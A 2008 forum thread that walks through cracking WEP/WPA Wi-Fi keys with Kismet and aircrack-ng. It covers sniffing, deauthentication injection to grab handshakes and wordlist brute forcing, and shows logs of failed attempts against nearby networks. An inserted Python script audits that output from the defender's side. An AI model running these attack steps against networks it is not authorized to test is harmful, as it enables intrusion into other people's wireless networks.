Cracking WEP/WPA Access Point log example
Langy
Administrator
Post: #1
Cracking WEP/WPA Access Point log example

What is aircrack:

Code:
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover
keys once enough data packets have been captured. It implements the standard
FMS attack along with some optimizations like KoreK attacks, as well as the
all-new PTW attack, thus making the attack much faster compared to other WEP
cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

www.aircrack-ng.org

Download / Install aircrack-ng (deb):

Code:
langy@googlebig:~$ sudo apt-get install aircrack-ng

or

Code:
wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
tar -zxvf aircrack-ng-1.0-rc1.tar.gz
cd aircrack-ng-1.0-rc1
make
make install

For more information go here.

The Aircrack-ng suite includes these tools:

Code:
aircrack-ng   airdriver-ng  airmon-ng     airolib-ng    airtun-ng
airdecap-ng   aireplay-ng   airodump-ng   airserv-ng


In this example of WEP crack we will use:

1) Kismet (Wireless network detector)
2) airodump-ng (Sniffing packages)
3) aireplay-ng (is used to inject frames)
4) aircrack-ng (Brute force on sniffed packages)

------------------------------------------------------------------------------
1) Kismet (Wireless network detector)
Download / Install Kismet (deb):

Code:
langy@googlebig:~$ sudo apt-get install kismet

www.kismetwireless.net

Start kismet

Code:
langy@googlebig:~$ sudo kismet


   

With Kismet we can see all available wireless connections with all the information that we need (connected clients, channel, SSID, etc.).

2) airodump-ng (Sniffing packages)
airodump-ng --channel <channel> -b <bssid> <interface> --write <file>

Example:

Code:
langy@googlebig:~$ sudo airodump-ng --channel 11 wlan0 --write testsnif
CH 11 ][ Elapsed: 8 mins ][ 2008-10-06 22:28                                  
                                                                              
BSSID     PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES
                                                                              
XX:69:31:1E  0   0        0       0    0  11  48  WEP  WEP   A
XX:62:33:30  0  90     4933   18187   32  11  54. WPA  TKIP   PSK  N
XX:40:6F:BC  -1   0        0      646    0  11  -1  OPN      <
                                                                              
BSSID              STATION            PWR   Rate  Lost  Packets  Probes      
                                                                              
XX:62:33:30  XX:8F:DA:FA   -1  36- 0    0    17845              
(not associated)   XX:32:52:40   0   0- 1    0    97  default,DLINK
(not associated)   XX:12:78:50   0   0- 1    0    49              
(not associated)   XX:9D:CA:32   0   0- 1    0    36  HotSpot Resid
(not associated)   XX:A2:2C:CC   0   0- 1    0    12              
(not associated)   XX:4B:B0:FC   0   0- 1    0    56  HotSpot Resid
(not associated)   XX:02:ED:70   0   0- 1    0    15  HotSpot Resid
(not associated)   XX:2C:DB:D3   0   0- 1    0    5  3Com
XX:40:6F:BC  XX:8E:F4:78   0   0- 1     0     761  foti


This sniff will save testing_snif-01.cap in our home folder.

3) aireplay-ng (is used to inject frames)
aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <interface>

With this command we can take handshake packages.

aireplay-ng is used simultaneously with airodump-ng!


4) aircrack (Brute force on sniffed packages)
aircrack-ng -w <wordlist> -b <bssid> <file.cap>

You can find a good wordlist on the St4ck website
Download: wordlist.zip

Example of failed handshakes:

Code:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/testsnif-01.cap
Read 45077 packets.

   #  BSSID              ESSID                     Encryption

   1  XX:62:33:30  NETGEAR                   WPA (0 handshake)
   2  XX:40:6F:BC                            None (192.168.2.5)
   3  XX:F0:85:58  dado                      No data - WEP or WPA
   4  XX:69:31:1E  Alice-382XXXX            No data - WEP or WPA

Index number of target network ? 1

Opening /home/langy/testsnif-01.cap
No valid WPA handshakes found..


Quitting aircrack-ng...
langy@googlebig:~$


Example of insufficient IVs:

Code:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Read 192412 packets.

   #  BSSID              ESSID                     Encryption

   1  XX:62:33:30  NETGEAR                   WPA (0 handshake)
   2  XX:00:3C:A5  HotSpot Residence  None (0.0.0.0)
   3  XX:69:31:1E  Alice-382XXXX            No data - WEP or WPA
   4  XX:56:66:F0  TESTING CENTER            WEP (7340 IVs)
   5  XX:D4:46:60                            No data - WEP or WPA
   6  XX:6D:92:D0                            Unknown
   7  XX:40:6F:BC                            None (192.168.2.5)
   8  XX:F0:85:58  dado                      No data - WEP or WPA

Index number of target network ? 4

Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 2677 ivs.


                                 Aircrack-ng 1.0 beta1


                 [00:00:58] Tested 167049 keys (got 2677 IVs)

   KB    depth   byte(vote)
    0   55/ 56   FC(3328) 02(3072) 0F(3072) 12(3072) 13(3072)
    1    9/ 15   03(4352) 23(4096) 2A(4096) 5D(4096) 88(4096)
    2    1/  2   5F(5120) AE(4352) C4(4352) 05(4096) 0E(4096)
    3   12/  3   ED(4096) 05(3840) 27(3840) 2A(3840) 32(3840)
    4   17/  4   C1(4352) 73(4096) FC(4096) 29(3840) 50(3840)

Failed. Next try with 5000 IVs.

Quitting aircrack-ng...


"There is no patch for human stupidity" - K. D. M.

This post was last modified: 17-10-2008 01:24 AM by Langy.

07-10-2008 10:55 AM
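
For the network owner's side of the same output, this added example (not part of the original post or of aircrack-ng; the function name and severity policy are assumptions) parses the network summary table shown in the logs above and flags which access points need remediation. It handles the empty and multi-word ESSIDs that appear in that table.

```python
import re

# Rows copied from the aircrack-ng network summary in the post above
# (BSSIDs are already redacted there).
SAMPLE = """\
   1  XX:62:33:30  NETGEAR                   WPA (0 handshake)
   2  XX:00:3C:A5  HotSpot Residence  None (0.0.0.0)
   3  XX:69:31:1E  Alice-382XXXX            No data - WEP or WPA
   4  XX:56:66:F0  TESTING CENTER            WEP (7340 IVs)
   5  XX:D4:46:60                            No data - WEP or WPA
   6  XX:6D:92:D0                            Unknown
"""

# ESSID may be empty or contain spaces, so anchor on the known
# encryption strings at the end of the row instead of splitting on spaces.
ROW = re.compile(
    r"^\s*(?P<idx>\d+)\s+(?P<bssid>\S+)\s+(?P<essid>.*?)\s*"
    r"(?P<enc>WPA \(\d+ handshake\)|WEP \((?P<ivs>\d+) IVs\)"
    r"|None \([\d.]+\)|No data - WEP or WPA|Unknown)\s*$"
)

# Hypothetical severity policy for this example; not part of aircrack-ng.
POLICY = {
    "WEP": ("high", "key is recoverable from captured IVs; move off WEP"),
    "None": ("high", "open network; traffic is sent unencrypted"),
    "WPA": ("medium", "PSK can be guessed offline from a wordlist; "
                      "use a long random passphrase"),
}

def audit(summary):
    """Return one finding per network row found in the summary text."""
    findings = []
    for line in summary.splitlines():
        m = ROW.match(line)
        if m is None:
            continue  # banners, prompts and blank lines
        kind = m["enc"].split(" ", 1)[0]
        severity, advice = POLICY.get(
            kind, ("review", "encryption could not be determined"))
        findings.append({
            "bssid": m["bssid"], "essid": m["essid"], "encryption": m["enc"],
            "ivs": int(m["ivs"]) if m["ivs"] else None,
            "severity": severity, "advice": advice,
        })
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['severity']:6} {f['bssid']:12} "
              f"{f['essid'] or '<no ESSID>':18} {f['advice']}")
```
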
Ic3
GB - Newbie
Post: #2
RE: Cracking WEP/WPA Access Point log example

good info, thx man =)


0wn3d =/
09-11-2008 01:43 PM